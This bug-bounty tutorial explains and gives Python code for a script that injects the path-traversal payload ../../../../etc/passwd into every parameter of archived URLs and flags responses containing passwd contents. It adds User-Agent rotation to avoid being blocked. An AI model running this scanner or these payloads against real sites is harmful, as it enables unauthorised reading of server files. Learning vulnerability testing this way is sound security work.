How to write a simple script to automate finding bugs

A simple way to write a Python script to automate finding bugs

Hello everyone! Today, I will talk about how to write a simple Python script to automate finding bugs. I will use Local File Inclusion (LFI) findings as an example.

Content

Requirements

Wayback URLs with parameters, e.g. https://example.com?file=ay_value.txt (you can check my simple methodology to learn how to grab them).

Python3 and pip3

Useful tools such as GF, GF-Patterns, and Uro, all of which you can get from GitHub

Let’s get started…

Warning

First, we need to understand that we will only try to exploit the GET parameters in the collected GET URLs, so we will not cover all of the application’s functions. There are still many POST requests whose parameters may also be vulnerable, so PLEASE don’t depend 100% on what we do here!

URL Prerequisites

Before we get started, we need to know why we use GF, GF-Patterns, and Uro.

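If we have a file containing 1M links with parameters, 60% or more of them may be similar links, and testing all of them will waste your time. For example, several links may hit the same endpoint with the same parameter names and differ only in the parameter values.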

Since the parameters are the same, we only need one of those links, and this is the job of uro. You can also use dpfilter, which does the same job.
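To make the idea concrete, here is a minimal Python sketch of this kind of deduplication. It is a simplified stand-in, not uro’s actual algorithm (uro applies more rules): it keeps the first URL for each combination of scheme, host, path, and parameter names, ignoring the values. The function name `dedupe_urls` and the sample URLs are hypothetical.

```python
from urllib.parse import urlsplit, parse_qsl


def dedupe_urls(urls):
    """Keep one URL per (scheme, host, path, parameter names) signature.

    Simplified illustration only; uro itself uses more rules than this.
    """
    seen = set()
    unique = []
    for url in urls:
        parts = urlsplit(url)
        # Parameter names only, sorted, so different values and ordering are ignored
        names = tuple(sorted({name for name, _ in parse_qsl(parts.query, keep_blank_values=True)}))
        signature = (parts.scheme, parts.netloc.lower(), parts.path, names)
        if signature not in seen:
            seen.add(signature)
            unique.append(url)
    return unique


urls = [
    "https://example.com/view?file=a.txt",
    "https://example.com/view?file=b.txt",
    "https://example.com/view?file=c.txt&lang=en",
]
print(dedupe_urls(urls))
# ['https://example.com/view?file=a.txt', 'https://example.com/view?file=c.txt&lang=en']
```

The second URL is dropped because it only differs from the first in the value of `file`, while the third survives because it has an extra parameter.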

After deduplicating the URLs, we need to filter them again based on popular parameter names; this is where GF and GF-Patterns come in.

For example, a parameter named file suggests that a URL may be vulnerable to LFI, while many other parameter names give no such hint. Based on the parameter name alone, we can predict which links are likely to be vulnerable.
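GF does this filtering with grep patterns from GF-Patterns. As a rough Python illustration of the same idea, the sketch below keeps only URLs that contain at least one parameter name from a small list. The set `LFI_PARAMS` is a hypothetical example chosen for illustration, not the contents of the GF-Patterns LFI pattern.

```python
from urllib.parse import urlsplit, parse_qsl

# Hypothetical list of parameter names that often carry file paths;
# GF-Patterns ships its own, different list.
LFI_PARAMS = {"file", "page", "path", "doc", "document", "folder", "include", "template"}


def filter_by_param_names(urls, interesting=LFI_PARAMS):
    """Return URLs that have at least one parameter whose name is in `interesting`."""
    matches = []
    for url in urls:
        query = urlsplit(url).query
        # Compare names case-insensitively (FILE, File and file all match)
        names = {name.lower() for name, _ in parse_qsl(query, keep_blank_values=True)}
        if names & interesting:
            matches.append(url)
    return matches


print(filter_by_param_names([
    "https://example.com/view?file=report.pdf",
    "https://example.com/item?id=42",
]))
# ['https://example.com/view?file=report.pdf']
```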

Coding

It’s time to start coding.

First, we need these libraries:

Let’s learn more about exurl.

exurl is used to put your payload in every parameter of a URL. For example, if we have a URL like https://example.com?file=aykalam&doc=zzzzzz, we need to put our payload, ../../../../etc/passwd, in each parameter separately to create 2 URLs. So what’s the difference between the exurl library and the qsreplace tool?

Here are the differences

Now you can see what I mean: exurl replaces each parameter in a separate URL, while qsreplace replaces all of them in the same URL.
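The difference can be illustrated with a small Python sketch built on `urllib.parse`. It only mimics the two behaviours for the example URL above; it does not use or reproduce the real code of exurl or qsreplace, and the function names are hypothetical.

```python
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

PAYLOAD = "../../../../etc/passwd"


def replace_each_param(url, payload):
    """exurl-style: one new URL per parameter, with only that parameter replaced."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    results = []
    for i in range(len(params)):
        # Keep every other value, swap in the payload at position i only
        new_params = [(k, payload if j == i else v) for j, (k, v) in enumerate(params)]
        query = urlencode(new_params, safe="/")  # keep "/" readable in the payload
        results.append(urlunsplit(parts._replace(query=query)))
    return results


def replace_all_params(url, payload):
    """qsreplace-style: a single URL with every parameter value replaced."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    query = urlencode([(k, payload) for k, _ in params], safe="/")
    return urlunsplit(parts._replace(query=query))


url = "https://example.com?file=aykalam&doc=zzzzzz"
for u in replace_each_param(url, PAYLOAD):
    print(u)
# https://example.com?file=../../../../etc/passwd&doc=zzzzzz
# https://example.com?file=aykalam&doc=../../../../etc/passwd
print(replace_all_params(url, PAYLOAD))
# https://example.com?file=../../../../etc/passwd&doc=../../../../etc/passwd
```

The per-parameter approach costs more requests, but if only `doc` is injectable you can tell exactly which parameter triggered the finding.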

The second step is to take the URL file from the user using the sys library. Remember that the file MUST contain only links with parameters, because they are our scope.
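A minimal sketch of this step, assuming the file holds one URL per line. As a safety net it also skips any line without a query string, since those are outside our scope. The names `load_urls` and `main` are hypothetical, not taken from the original script.

```python
import sys
from urllib.parse import urlsplit


def load_urls(path):
    """Read one URL per line, keeping only URLs that have a query string."""
    urls = []
    with open(path, encoding="utf-8", errors="replace") as handle:
        for line in handle:
            url = line.strip()
            # Skip blank lines and links without parameters (outside our scope)
            if url and urlsplit(url).query:
                urls.append(url)
    return urls


def main(argv):
    """Expect the URL file path as the only command-line argument."""
    if len(argv) != 2:
        print(f"Usage: {argv[0]} <urls_file>", file=sys.stderr)
        return 1
    urls = load_urls(argv[1])
    print(f"Loaded {len(urls)} URLs with parameters")
    return 0


# In the script itself: if __name__ == "__main__": sys.exit(main(sys.argv))
```

You would then run it as `python3 script.py urls.txt`, where `sys.argv[1]` is the file name.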

The next step is to create a function that splits every URL into separate URLs, putting the payload in a different parameter each time, using exurl as demonstrated above.

As you can see, it takes the file, replaces every parameter’s value, and returns the output as a list called splitted_urls.
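Since the exurl calls themselves only appear in the original screenshot, here is a stand-in sketch of such a function using only `urllib.parse`. The name `split_urls` is hypothetical, and the per-parameter logic imitates what exurl is described as doing above rather than calling its real API. It also drops duplicate payload URLs so the same request is not sent twice.

```python
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode


def split_urls(urls, payload="../../../../etc/passwd"):
    """Return splitted_urls: one payload URL per parameter of every input URL."""
    splitted_urls = []
    seen = set()
    for url in urls:
        parts = urlsplit(url)
        params = parse_qsl(parts.query, keep_blank_values=True)
        for i in range(len(params)):
            # Replace only the i-th parameter's value with the payload
            new_params = [(k, payload if j == i else v) for j, (k, v) in enumerate(params)]
            new_url = urlunsplit(parts._replace(query=urlencode(new_params, safe="/")))
            if new_url not in seen:  # avoid requesting the same URL twice
                seen.add(new_url)
                splitted_urls.append(new_url)
    return splitted_urls


splitted_urls = split_urls([
    "https://example.com?file=aykalam&doc=zzzzzz",
    "https://example.com/page?path=home",
])
print(len(splitted_urls))  # 3
```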

The next step is to create another function that takes each URL from splitted_urls, sends a request to it, and checks whether the payload worked.
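A minimal version of that check, written with the standard library’s `urllib.request` instead of whichever HTTP library the original script imports. It assumes the payload targets `/etc/passwd`, so it treats the string `root:x:0:0:` (the root entry that normally begins that file on Linux) as the sign of success. The marker, timeout, User-Agent, and function name are all assumptions.

```python
import http.client
import urllib.request

# Assumed success marker: the root entry that normally begins /etc/passwd
MARKER = "root:x:0:0:"


def check_url(url, marker=MARKER, timeout=10):
    """Request one payload URL; return True (and print it) if the marker is in the body."""
    try:
        request = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
        with urllib.request.urlopen(request, timeout=timeout) as response:
            body = response.read().decode("utf-8", errors="replace")
    except (OSError, ValueError, http.client.HTTPException):
        # URLError, HTTPError and socket timeouts are OSError subclasses;
        # malformed URLs raise ValueError. Treat any failure as "not vulnerable".
        return False
    if marker in body:
        print(f"[VULNERABLE] {url}")
        return True
    return False
```

One design note: HTTP error responses are skipped here, even though a vulnerable page could answer with an error status; catching `urllib.error.HTTPError` separately and reading its body would cover that case.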

So far, we have two functions: one for splitting URLs and one for sending a request to each URL.

If you wonder why the second function handles one URL at a time instead of taking the whole list and looping over it, the answer is the progress bar function: it calls the request function for each URL so it can update the bar after every request.

The final step is to create a function that tracks the progress and displays a progress bar.
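The original progress bar code is not visible in the text, so here is a dependency-free stand-in. It calls a per-URL check function once per URL and redraws a simple text bar showing the percentage of finished URLs and an estimated time remaining. This is also why the check function works on a single URL: the loop can update the bar after every request. The names `run_with_progress` and `check` are hypothetical.

```python
import sys
import time


def run_with_progress(urls, check, width=30):
    """Call check(url) for each URL, drawing a progress bar with percentage and ETA.

    Returns the list of URLs for which check(url) returned True.
    """
    vulnerable = []
    total = len(urls)
    start = time.monotonic()
    for done, url in enumerate(urls, start=1):
        if check(url):
            vulnerable.append(url)
        elapsed = time.monotonic() - start
        # Estimate remaining time from the average time per finished URL
        eta = elapsed / done * (total - done)
        filled = int(width * done / total)
        bar = "#" * filled + "-" * (width - filled)
        sys.stderr.write(f"\r[{bar}] {done * 100 // total:3d}% ETA {eta:5.1f}s")
        sys.stderr.flush()
    if total:
        sys.stderr.write("\n")
    return vulnerable


# Usage with a dummy check; in the real script this would be the request function
found = run_with_progress(["u1", "u2", "u3", "u4"], check=lambda url: url == "u3")
print(found)  # ['u3']
```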

Let’s summarize what we have done. First, we take a file of URLs with parameters and pass them to exurl, a library that replaces every parameter’s value with the payload ../../../../etc/passwd.

After that, the script calls a function that sends a request to every payload URL and checks whether a specific word appears in the response. If it does, the script prints the vulnerable URL; if not, it moves on to the next one.

To track our progress, we created a progress bar that shows the percentage of finished URLs and the estimated time to finish the process.

The final code is:



After trying it on a file containing 21 links, which exurl expanded into 28 payload URLs, we discovered a vulnerable link.

Bonus options

1. You can put more than one LFI payload in a list and loop over them, trying each one on every URL.

2. You can put more than one User-Agent in a list and choose a random one for every request to avoid being blocked based on your User-Agent; you can use the random library for this step.

3. You can use a Telegram bot token to notify you when the script discovers a vulnerable link or finishes, using the subprocess library to execute the curl command.
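The three bonus ideas can be sketched together in Python. Everything here is illustrative: the extra payload, the User-Agent strings, and the helper names are hypothetical placeholders. The Telegram part assumes the Bot API `sendMessage` method with your own bot token and chat ID. The curl command is built as an argument list and only executed if you call `notify_telegram`.

```python
import random
import subprocess
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Hypothetical payload and User-Agent lists; replace with your own
PAYLOADS = ["../../../../etc/passwd", "....//....//....//etc/passwd"]
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Mozilla/5.0 (X11; Linux x86_64)",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)",
]


def payload_urls(url, payloads=PAYLOADS):
    """Option 1: yield a URL for every payload in every parameter of `url`."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for payload in payloads:
        for i in range(len(params)):
            new_params = [(k, payload if j == i else v) for j, (k, v) in enumerate(params)]
            yield urlunsplit(parts._replace(query=urlencode(new_params, safe="/")))


def random_headers():
    """Option 2: pick a random User-Agent for each request."""
    return {"User-Agent": random.choice(USER_AGENTS)}


def telegram_curl_command(token, chat_id, text):
    """Option 3: build a curl command that calls the Telegram Bot API sendMessage method."""
    return [
        "curl", "-s", "-X", "POST",
        f"https://api.telegram.org/bot{token}/sendMessage",
        "-d", f"chat_id={chat_id}",
        "--data-urlencode", f"text={text}",
    ]


def notify_telegram(token, chat_id, text):
    """Run the curl command; needs curl installed and a real bot token."""
    subprocess.run(telegram_curl_command(token, chat_id, text), check=False)
```

Passing the command as a list (rather than one shell string) means the message text is never interpreted by a shell, so a URL containing `&` or `;` cannot break the command.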

Thanks to

Abdulrhman Kamel for his great library exurl and his efforts.
